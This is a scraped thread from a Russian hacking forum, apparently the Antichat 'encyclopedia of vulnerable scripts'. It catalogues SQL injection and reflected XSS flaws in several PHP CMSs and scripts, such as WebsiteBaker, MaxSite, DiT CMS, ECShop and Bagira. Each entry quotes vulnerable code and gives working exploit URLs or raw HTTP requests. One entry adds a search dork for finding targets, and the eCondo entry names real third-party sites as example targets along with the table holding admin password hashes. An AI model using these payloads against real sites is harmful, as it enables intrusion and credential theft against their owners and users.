ANTICHAT - Энциклопедия уязвимых скриптов

ANTICHAT (https://forum.antichat.xyz/index.php)

- Веб-уязвимости (https://forum.antichat.xyz/forumdisplay.php?f=114)

- - Энциклопедия уязвимых скриптов (https://forum.antichat.xyz/showthread.php?t=19997)

[SIZE="2"][COLOR="DarkOrange"]PHD Help Desk

[QUOTE="VY_CMa"]
[SIZE="2"][COLOR="DarkOrange"]PHD Help Desk =5.1 , а потому на ранних версиях, скорее всего, нужно искать вектор Error-Baesd через rand(0).

WebsiteBaker CMS

Уязвимый модуль : FAQ Maker

SQL Injection

требования: mq = Off

/modules/faqmaker/view.php

PHP код:


		
			
[COLOR="#000000"][COLOR="#0000BB"][/COLOR][COLOR="#007700"]....

if (isset([/COLOR][COLOR="#0000BB"]$_GET[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'qa_id'[/COLOR][COLOR="#007700"]])) {

[/COLOR][COLOR="#0000BB"]$qa[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]explode[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#DD0000"]"."[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]$_GET[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'qa_id'[/COLOR][COLOR="#007700"]]);

[/COLOR][COLOR="#0000BB"]$t_id[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]$qa[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#0000BB"]0[/COLOR][COLOR="#007700"]];

[/COLOR][COLOR="#0000BB"]$q_id[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]$qa[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#0000BB"]1[/COLOR][COLOR="#007700"]];

    

[/COLOR][COLOR="#0000BB"]$query_quests[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]$database[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]query[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#DD0000"]"SELECT * FROM `"[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]TABLE_PREFIX[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#DD0000"]"mod_faqmaker_questions` WHERE question_id='[/COLOR][COLOR="#0000BB"]$q_id[/COLOR][COLOR="#DD0000"]'"[/COLOR][COLOR="#007700"]);

[/COLOR][COLOR="#0000BB"]$quests[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]$query_quests[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]fetchRow[/COLOR][COLOR="#007700"]();

[/COLOR][COLOR="#0000BB"]$answer[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]$quests[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'answer'[/COLOR][COLOR="#007700"]];

[/COLOR][COLOR="#0000BB"]$modified_when[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]$quests[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'modified_when'[/COLOR][COLOR="#007700"]];

[/COLOR][COLOR="#0000BB"]$wb[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]preprocess[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$answer[/COLOR][COLOR="#007700"]);

....

[/COLOR][/COLOR]

PoC: /page.php?qa_id=1.2'+and+0+union+select+1,2,3,4,5,6 ,7,8--+

Condominium Management SystemeCondo

Сингапурская контора.

Официальный сайт http://www.econdo.com.sg/

SQL Injection

Уязвимый сценарий: /dev/label.php

Уязвимый параметр:id

Вектор: error-based

Exploit:[site/dev/label.php?id=1 or(SELECT 1 from information_schema.tables group by concat((SELECT{YOUR REQUEST}),floor(rand(0)*2))having max(0)) --]

Примеры:

Цитата:

Сообщение от None

http://www.compassheights.com.sg/dev/label.php?id=15
http://rosewoodsuites.com.sg/dev/label.php?id=2
http://www.dakotaresidences.net/dev/label.php?id=14

Панель администратора: site/dev/login.php

MD5-хэши паролей и имена пользователей наxодятся в таблице dev_user, имена колонок соответственноdev_pword и dev_user_name.

Исходники не нашел.

Уязвимый сценарий statpage.php от ukrlab.com

Официальный сайт http://www.ukrlab.com

SQL Injection

Уязвимый параметр: stid

Dork: inurl:statpage.php?stid=

Вектор: union-query

Требования: mq = off

Уязвимый код (запрос вытаскивал из PROCESSLIST, код может отличаться, но смысл один):

PHP код:


		
			
[COLOR="#000000"][COLOR="#0000BB"][/COLOR][COLOR="#007700"]...

[/COLOR][COLOR="#0000BB"]$id[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]$_GET[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'stid'[/COLOR][COLOR="#007700"]];

...

[/COLOR][COLOR="#0000BB"]$query[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#DD0000"]"SELECT * FROM ua_k_stat_page WHERE id= '"[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]$id[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#DD0000"]"' "[/COLOR][COLOR="#007700"];

...[/COLOR][/COLOR]

Exploit: [site/statpage.php?stid=99999.9/*!UNION SELECT 1,version(),3,4,5*/ -- ]

CMS WebsiteBaker

Version 2.8.3 - последняя версия!

Официальный сайт http://www.websitebaker.org

passive XSS (reflected)

Требования: права администратора

Уязвимый сценарий:admin/admintools/tool.php

PHP код:


		
			
[COLOR="#000000"][COLOR="#0000BB"]$doSave[/COLOR][COLOR="#007700"]= (isset([/COLOR][COLOR="#0000BB"]$_POST[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'save_settings'[/COLOR][COLOR="#007700"]]) || (isset([/COLOR][COLOR="#0000BB"]$_POST[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'action'[/COLOR][COLOR="#007700"]]) &&[/COLOR][COLOR="#0000BB"]strtolower[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$_POST[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'action'[/COLOR][COLOR="#007700"]]) ==[/COLOR][COLOR="#DD0000"]'save'[/COLOR][COLOR="#007700"]));

[/COLOR][COLOR="#FF8000"]// test for valid tool name

[/COLOR][COLOR="#007700"]if([/COLOR][COLOR="#0000BB"]preg_match[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#DD0000"]'/^[a-z][a-z_\-0-9]{2,}$/i'[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]$toolDir[/COLOR][COLOR="#007700"])) {

[/COLOR][COLOR="#FF8000"]// Check if tool is installed

[/COLOR][COLOR="#0000BB"]$sql[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#DD0000"]'SELECT `name` FROM `'[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]TABLE_PREFIX[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#DD0000"]'addons` '[/COLOR][COLOR="#007700"].

[/COLOR][COLOR="#DD0000"]'WHERE `type`=\'module\' AND `function`=\'tool\' '[/COLOR][COLOR="#007700"].

[/COLOR][COLOR="#DD0000"]'AND `directory`=\''[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]$toolDir[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#DD0000"]'\''[/COLOR][COLOR="#007700"];

        if(([/COLOR][COLOR="#0000BB"]$toolName[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]$database[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]get_one[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$sql[/COLOR][COLOR="#007700"]))) {

[/COLOR][COLOR="#FF8000"]// create admin-object and print header if FTAN is NOT supported AND function 'save' is requested

[/COLOR][COLOR="#0000BB"]$admin_header[/COLOR][COLOR="#007700"]= !([/COLOR][COLOR="#0000BB"]is_file[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]WB_PATH[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#DD0000"]'/modules/'[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]$toolDir[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#DD0000"]'/FTAN_SUPPORTED'[/COLOR][COLOR="#007700"]) &&[/COLOR][COLOR="#0000BB"]$doSave[/COLOR][COLOR="#007700"]);

[/COLOR][COLOR="#0000BB"]$admin[/COLOR][COLOR="#007700"]= new[/COLOR][COLOR="#0000BB"]admin[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#DD0000"]'admintools'[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#DD0000"]'admintools'[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]$admin_header[/COLOR][COLOR="#007700"]);

            if(![/COLOR][COLOR="#0000BB"]$doSave[/COLOR][COLOR="#007700"]) {

[/COLOR][COLOR="#FF8000"]// show title if not function 'save' is requested

[/COLOR][COLOR="#007700"]print[/COLOR][COLOR="#DD0000"]''[/COLOR][COLOR="#007700"].

[/COLOR][COLOR="#0000BB"]$HEADING[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'ADMINISTRATION_TOOLS'[/COLOR][COLOR="#007700"]].[/COLOR][COLOR="#DD0000"]''[/COLOR][COLOR="#007700"].

[/COLOR][COLOR="#DD0000"]'&nbsp;&raquo;&nbsp;'[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]$toolName[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#DD0000"]''[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#DD0000"]"\n"[/COLOR][COLOR="#007700"];

            }

[/COLOR][COLOR="#FF8000"]// include modules tool.php

[/COLOR][COLOR="#007700"]require([/COLOR][COLOR="#0000BB"]WB_PATH[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#DD0000"]'/modules/'[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]$toolDir[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#DD0000"]'/tool.php'[/COLOR][COLOR="#007700"]);

[/COLOR][COLOR="#0000BB"]$admin[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]print_footer[/COLOR][COLOR="#007700"]();

        }else {

[/COLOR][COLOR="#FF8000"]// no installed module found, jump to index.php of admintools

[/COLOR][COLOR="#0000BB"]header[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#DD0000"]'location: '[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]ADMIN_URL[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#DD0000"]'/admintools/index.php'[/COLOR][COLOR="#007700"]);

            exit([/COLOR][COLOR="#0000BB"]0[/COLOR][COLOR="#007700"]);

        }

    }else {

[/COLOR][COLOR="#FF8000"]// invalid module name requested, jump to index.php of admintools

[/COLOR][COLOR="#0000BB"]header[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#DD0000"]'location: '[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]ADMIN_URL[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#DD0000"]'/admintools/index.php'[/COLOR][COLOR="#007700"]);

        exit([/COLOR][COLOR="#0000BB"]0[/COLOR][COLOR="#007700"]);

    }[/COLOR][/COLOR]

Exploit:

Цитата:

Сообщение от None

POST /wsb/admin/admintools/tool.php/
">alert(1)
?tool=SecureFormSwitcher HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://127.0.0.1/wsb/admin/admintools/tool.php?tool=SecureFormSwitcher
Cookie: vc=12; wb_session_id=par1; wb_5773_session_id=par2; PHPSESSID=par3
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 111
par=par_par&singletab=true&ftan_switch=&save_setti ngs=Accept&fingerprint_with_ip_octets=2

CMS MaxSite

Version 0.862 - последняя версия!

Официальный сайт http://www.max-3000.com

passive XSS (reflected) в заголовке Referer

Уязвимости на странице с формой регистрации и странице авторизации.

Вектор проведения атаки идентичен, поэтому рассмотрю только страницу авторизации.

127.0.0.1/MaxSite/application/maxsite/templates/default/components/_login/_login.php

PHP код:


		
			
[COLOR="#000000"][COLOR="#0000BB"][/COLOR][COLOR="#007700"][/COLOR][COLOR="#0000BB"]config[/COLOR][COLOR="#DD0000"]['site_url'] . 'login"[/COLOR][COLOR="#0000BB"]name[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#DD0000"]"flogin"[/COLOR][COLOR="#007700"]>

[/COLOR][COLOR="#0000BB"]config[/COLOR][COLOR="#DD0000"]['site_url'] . mso_current_url() . '"[/COLOR][COLOR="#0000BB"]name[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#DD0000"]"flogin_redirect"[/COLOR][COLOR="#007700"]>

[/COLOR][COLOR="#0000BB"]data[/COLOR][COLOR="#DD0000"]['session']['session_id'] . '"[/COLOR][COLOR="#0000BB"]name[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#DD0000"]"flogin_session_id"[/COLOR][COLOR="#007700"]>[/COLOR][/COLOR]

Exploit:

Цитата:

Сообщение от None

GET /loginform/ HTTP/1.1
Host: max-3000.com
User-Agent: Mozilla
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer
:
http://www.google.com/search?hl=en&q=">alert(1)
Cookie: ci_session=
Connection: close

DiT CMS

Версия 2.1.2 (последняя!)

Официальный сайт http://dit-cms.ru

SQL Injection

Уязвимый сценарий: search.php

Уязвимый параметр: dit_search_string_content

Вектор: error-based

Уязвимый код:

PHP код:


		
			
[COLOR="#000000"][COLOR="#0000BB"][/COLOR][COLOR="#007700"]if ([/COLOR][COLOR="#0000BB"]$_POST[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]"dit_search_string_content"[/COLOR][COLOR="#007700"]] !=[/COLOR][COLOR="#0000BB"]NULL[/COLOR][COLOR="#007700"])

        {

[/COLOR][COLOR="#0000BB"]$search[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]$_POST[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]"dit_search_string_content"[/COLOR][COLOR="#007700"]];            

            

[/COLOR][COLOR="#0000BB"]$query[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#DD0000"]"SELECT * FROM "[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]db_prefix[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#DD0000"]"_part WHERE header_"[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]lang_system[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#DD0000"]" LIKE '%[/COLOR][COLOR="#007700"]{[/COLOR][COLOR="#0000BB"]$search[/COLOR][COLOR="#007700"]}[/COLOR][COLOR="#DD0000"]%' OR desc_"[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]lang_system[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#DD0000"]" LIKE '%[/COLOR][COLOR="#007700"]{[/COLOR][COLOR="#0000BB"]$search[/COLOR][COLOR="#007700"]}[/COLOR][COLOR="#DD0000"]%' "[/COLOR][COLOR="#007700"];

[/COLOR][COLOR="#0000BB"]$data[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]mysql_query[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$query[/COLOR][COLOR="#007700"]) or die ([/COLOR][COLOR="#0000BB"]mysql_error[/COLOR][COLOR="#007700"]());

[/COLOR][COLOR="#0000BB"]$result[/COLOR][COLOR="#007700"]= array();[/COLOR][/COLOR]

Exploit:

Цитата:

Сообщение от None

POST / HTTP/1.1
Host: dit-cms.ru
...
dit_search_string_content=
'and(extractvalue(1,concat(0x3a,version())))and'
&dit_button_search.x=0&dit_button_search.y=0

passive XSS (reflected) в том же параметре

Exploit:

Цитата:

Сообщение от None

POST / HTTP/1.1
Host: dit-cms.ru
...
dit_search_string_content=
alert('Antichat')
&dit_button_search.x=0&dit_button_search.y=0

ECShop V2.7.3

Официальный сайт http://ecshop.com (разработана в Поднебесной)

Исследовал на демо-версии.

passive XSS (reflected) в Referer

Отправляем пакет:

Цитата:

Сообщение от None

GET /user.php HTTP/1.1
Host: ecshop-273-1106.chinascript.ru
User-Agent: Mozilla
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer:
">alert('Antichat')
Connection: keep-alive

CMS Bagira

Версия 1.1.7b (последняя)

Официальный сайт http://bagira-cms.ru/

SQL Injection

Уязвимый сценарий: ormPage.php

Уязвимый параметр: pseudo_url

Зависимости: mq=off

Вектор: error-based

Уязвимый код:

PHP код:


		
			
[COLOR="#000000"][COLOR="#0000BB"][/COLOR][COLOR="#007700"]if ([/COLOR][COLOR="#0000BB"]$pseudo_url[/COLOR][COLOR="#007700"]!==[/COLOR][COLOR="#0000BB"]false[/COLOR][COLOR="#007700"]) {

[/COLOR][COLOR="#0000BB"]$parent_id[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]$this[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]getParentId[/COLOR][COLOR="#007700"]();

[/COLOR][COLOR="#0000BB"]$s[/COLOR][COLOR="#007700"]= (empty([/COLOR][COLOR="#0000BB"]$this[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]id[/COLOR][COLOR="#007700"])) ?[/COLOR][COLOR="#DD0000"]''[/COLOR][COLOR="#007700"]:[/COLOR][COLOR="#DD0000"]'p_obj_id <> "'[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]$this[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]id[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#DD0000"]'" and '[/COLOR][COLOR="#007700"];

[/COLOR][COLOR="#0000BB"]$s[/COLOR][COLOR="#007700"].= (empty([/COLOR][COLOR="#0000BB"]$parent_id[/COLOR][COLOR="#007700"])) ?[/COLOR][COLOR="#DD0000"]'r_parent_id is NULL'[/COLOR][COLOR="#007700"]:[/COLOR][COLOR="#DD0000"]'r_parent_id = "'[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]$parent_id[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#DD0000"]'"'[/COLOR][COLOR="#007700"];

[/COLOR][COLOR="#0000BB"]$sql[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#DD0000"]'SELECT count(p_obj_id) FROM >, >, >

                            WHERE pseudo_url = "'[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]$pseudo_url[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#DD0000"]'" and

                                  lang_id = "'[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]languages[/COLOR][COLOR="#007700"]::[/COLOR][COLOR="#0000BB"]curId[/COLOR][COLOR="#007700"]().[/COLOR][COLOR="#DD0000"]'" and

                                  domain_id = "'[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]domains[/COLOR][COLOR="#007700"]::[/COLOR][COLOR="#0000BB"]curId[/COLOR][COLOR="#007700"]().[/COLOR][COLOR="#DD0000"]'" and

                                  r_children_id = p_obj_id and '[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]$s[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#DD0000"]' and

                                  o_id = p_obj_id and

                                  o_to_trash = 0;'[/COLOR][COLOR="#007700"];

[/COLOR][COLOR="#0000BB"]$count[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]db[/COLOR][COLOR="#007700"]::[/COLOR][COLOR="#0000BB"]q[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$sql[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]value[/COLOR][COLOR="#007700"]);[/COLOR][/COLOR]

Exploit:

Цитата:

Сообщение от None

GET /BagiraCMS/article
"*(UPDATEXML(1,concat(0x3a,(SELECT version())),4))*"
HTTP/1.1
Host: 127.0.0.1
...

passive XSS(reflected) в строке поиска:

Exploit:

Цитата:

Сообщение от None

POST /BagiraCMS/search HTTP/1.1
Host: 127.0.0.1
...
words=
">alert(1)